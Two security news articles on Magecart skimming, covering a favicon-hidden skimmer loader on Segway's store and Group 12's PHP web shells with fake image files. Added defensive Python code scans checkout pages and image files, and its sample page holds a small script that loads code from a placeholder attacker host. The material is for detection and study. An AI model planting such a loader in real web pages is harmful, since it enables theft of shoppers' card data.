
Magecart Allegedly Hacked the Segway Online Store


Researchers discovered a web skimmer on Segway's online store that let attackers capture payment-card numbers and personal information entered by customers during checkout.

Segway, the store's operator, is best known for Dean Kamen's two-wheeled, self-balancing personal transporter, and also sells other personal mobility products.

"While the company doesn't know how Segway's site was hacked, an attacker will normally target vulnerabilities in the CMS system or one of its plugins." "The hostname at store.segway[.]com runs Magento, a major content management system (CMS) utilized by numerous eCommerce sites and a favorite of Magecart threat actors."

Malwarebytes researchers, who found the skimmer on store.segway.com, attributed the attack to Magecart Group 12. The store was loading code from a known skimmer domain (booctstrap[.]com) that has been active since November and has been tied to earlier Magecart attacks.

Because the store runs Magento, the most likely entry point was a vulnerability in an outdated version of the CMS or one of its plugins, although the exact intrusion vector is not known. Malwarebytes also found a piece of JavaScript embedded in a file named "Copyright". That script is not itself the skimmer, but it dynamically loads the skimmer from the external domain, so anyone reading the page's HTML source sees only a harmless-looking copyright snippet and never the skimmer code.

Also noteworthy is that the attackers placed the skimmer inside a favicon.ico file. Favicons are the small icon images a site supplies for browser tabs and bookmarks; because they are expected to be binary image data, they are rarely inspected for script. According to Uriel Maimon, senior director of emerging technologies at security firm PerimeterX, this approach is becoming increasingly common.

"Magecart attackers are getting increasingly inventive in their attempts to avoid detection, especially given the developments in access control over time. Manual code review, static program analysis, and scanners could not have easily spotted the skimmer script hidden behind a favicon claiming to display the site's copyright."

To limit exposure to this kind of attack, shoppers can pay with virtual or one-time card numbers, tokenised wallets with strict spending limits, or cash on delivery where it is offered. A browser security extension that detects and blocks malicious JavaScript on checkout pages can also stop a skimmer before it captures the card details.
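The loader trick described above (an innocuous-looking inline script that creates a second script tag pointing at an attacker's host) is something a defender can look for in a page's HTML. The following is an added example, not code from Malwarebytes, Segway or the original post: it walks a checkout page's script tags, flags external script hosts that are not on an allowlist, and flags inline scripts that combine dynamic script loading with obfuscation primitives. The allowlisted hosts, the sample page and the host `skimmer-cdn.example` (a placeholder standing in for a domain such as the one named in the article) are all assumptions constructed for the example.

```python
"""Audit a checkout page's HTML for Magecart-style script loaders.

Added example, not the store's or the researchers' code.  The sample page
and the trusted-host list below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store is expected to load scripts from (assumption for the example).
TRUSTED_SCRIPT_HOSTS = {"store.example.com", "cdn.example.com"}

# Constructs common in skimmer loaders.  None is malicious by itself; the
# combination, or a dynamic load from an unknown host, warrants a manual look.
SUSPICIOUS_PATTERNS = {
    "dynamic_script_tag": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "base64_decode": re.compile(r"\batob\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "charcode_build": re.compile(r"fromCharCode"),
    "hex_escaped_string": re.compile(r"(\\x[0-9a-fA-F]{2}){4,}"),
}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attributes of <script src=...>
        self.inline = []     # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_html(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return a list of (finding, detail) tuples for the given HTML."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname          # None for relative paths
        if host and host not in trusted_hosts:
            findings.append(("untrusted_script_host", host))
    for body in parser.inline:
        # Surface any URL the inline code references so the reviewer sees the
        # host without de-obfuscating by hand.
        for url in re.findall(r"https?://[^\s'\"]+", body):
            host = urlparse(url).hostname
            if host and host not in trusted_hosts:
                findings.append(("untrusted_inline_url", host))
        hits = sorted(n for n, rx in SUSPICIOUS_PATTERNS.items() if rx.search(body))
        if "dynamic_script_tag" in hits or len(hits) >= 2:
            findings.append(("suspicious_inline_script", ",".join(hits)))
    return findings


# Constructed sample page modelled on the "copyright" loader: the inline
# script is not a skimmer, it only fetches one from a host that is not the
# store's own.  skimmer-cdn.example is a placeholder domain.
SAMPLE_CHECKOUT_HTML = """<html><head>
<link rel="shortcut icon" href="/favicon.ico">
<script src="https://store.example.com/js/checkout.js"></script>
</head><body>
<footer>&copy; 2022 Example Store</footer>
<script>
var s=document.createElement('script');
s.src='https://skimmer-cdn.example/assets/copyright.js';
document.head.appendChild(s);
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(*finding)
```

The audit is a review aid, not a control: a Content-Security-Policy header whose `script-src` lists only the store's own hosts makes the browser refuse the dynamic load regardless of how the loader is disguised, and is the server-side counterpart to the browser extension advice above.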

MageCart Group12 Employing New Technique to Target E-Commerce Websites


MageCart Group12 is known for targeting e-commerce websites to skim payment data from shoppers and sell it on the dark web. The group has shifted from its previously favoured method, JavaScript injected into vulnerable sites to record what customers type into checkout forms, to PHP web shells that give it persistent remote administrative access to the compromised sites.

Researchers from Sucuri found that the attackers store the stolen card data in .JPG files on compromised Magento sites until it can be exfiltrated. Many site owners remain on an outdated Magento version because they cannot afford to bring a developer back to upgrade once the site has fallen out of date and become vulnerable.

The cost to migrate a Magento 1 website (which had its end of life in 2020) to the more secure Magento 2 ranges from $5,000 to $50,000. Researchers believe that Magecart will continue to evolve and enhance its attacking techniques as long as its cybercrimes keep turning a profit. 

“The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper .PNG format for a valid image file. The way it is injected in compromised sites is by replacing the legitimate shortcut icon tags with a path to the fake .PNG file,” researchers explained. 

In the newer technique, the fake favicon instead loads a PHP web shell. Because the shell injects the skimmer on the server side rather than adding client-side JavaScript, it is harder to spot with browser-side monitoring and harder to block. "The creative use of the fake .JPG allows an attacker to conceal and store harvested credit-card details for future use without gaining too much attention from the website owner," Luke Leal, a researcher at Sucuri, stated.
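Both posts turn on the same trick: a file named as an image (favicon.ico in the Segway case, Magento.png and a .JPG here) that actually holds script or stolen data. The following is an added example, not Sucuri's or the original post's code: it checks a file's magic bytes against what its extension claims and scans the contents for a PHP open tag, a PHP-serialised array, card-number-like digit runs and long base64 blobs. The three sample files are constructed for the example, and the card number in them is the standard test value 4111 1111 1111 1111.

```python
"""Check that files served as icons/images really are images.

Added example, not Sucuri's tooling; the sample file contents are constructed.
"""
import re

# Magic bytes for the formats a favicon or product image should be.
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "ico": b"\x00\x00\x01\x00",
}

# Content that has no business inside an image.  A PHP open tag means the file
# is executable if the web server ever hands it to PHP; the others are the
# kind of content a skimmer stashes for later pickup.
PHP_TAG = re.compile(rb"<\?php|<\?=")
SERIALIZED_PHP = re.compile(rb"a:\d+:\{")             # output of PHP serialize()
CARD_NUMBER = re.compile(rb"\b(?:\d[ -]?){13,19}\b")  # loose PAN pattern
BASE64_BLOB = re.compile(rb"[A-Za-z0-9+/]{80,}={0,2}")


def image_format(data):
    """Return the image format implied by the leading bytes, or None."""
    for name, sig in IMAGE_SIGNATURES.items():
        if data.startswith(sig):
            return name
    return None


def classify_file(name, data):
    """Describe whether `data` is what the file name `name` claims to be."""
    ext = name.rsplit(".", 1)[-1].lower()
    claimed = {"jpg": "jpeg"}.get(ext, ext)
    actual = image_format(data)
    reasons = []
    if actual is None:
        reasons.append("no image signature")
    elif actual != claimed:
        reasons.append(f"signature is {actual}, extension says {claimed}")
    if PHP_TAG.search(data):
        reasons.append("contains PHP open tag")
    if SERIALIZED_PHP.search(data):
        reasons.append("contains PHP serialized array")
    if CARD_NUMBER.search(data):
        reasons.append("contains card-number-like digit runs")
    if BASE64_BLOB.search(data):
        reasons.append("contains long base64 blob")
    return {
        "name": name,
        "claimed": claimed,
        "actual": actual,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Constructed samples.  The "shell" is an empty placeholder, not a web shell.
SAMPLE_FILES = {
    # genuine PNG: signature followed by the start of an IHDR chunk
    "favicon.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x10\x00\x00\x00\x10",
    # fake favicon whose body is PHP rather than image data
    "Magento.png": b"<?php /* placeholder for a web shell body */ ?>",
    # "image" used as a drop for skimmed data (dummy test card number)
    "cache.jpg": b'a:2:{i:0;s:19:"4111 1111 1111 1111";i:1;s:3:"123";}',
}


def scan(files=SAMPLE_FILES):
    """Classify every (name, bytes) pair and return the list of results."""
    return [classify_file(n, d) for n, d in files.items()]


if __name__ == "__main__":
    for result in scan():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['name']:12} {flag:10} {'; '.join(result['reasons'])}")
```

Run this over a store's media and skin directories on a schedule and diff the results: a favicon whose signature changes, or a .jpg that suddenly carries a serialised array, is exactly the artefact described above, and it is visible from the file system even though nothing in the served HTML looks wrong.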

“The latest techniques observed in these recent Magecart attacks show how the groups themselves are staying innovative by using previous techniques with new coding and tactics. The most recent findings highlight how difficult it may be for defenders to detect skimming activity itself without employing additional code reviews or other types of blocking and inspection,” Sean Nikkel, senior cyber threat intel analyst at Digital Shadows, told Threatpost.

In September 2020, Magecart Group 12 hacked nearly 2,000 e-commerce sites in an automated campaign impacting tens of thousands of customers, who had their credit cards and other information stolen. Scammers employed the classic Magecart attack technique where e-commerce sites are injected with a web skimmer, which secretly exfiltrates personal and banking information entered by users during the online checkout process.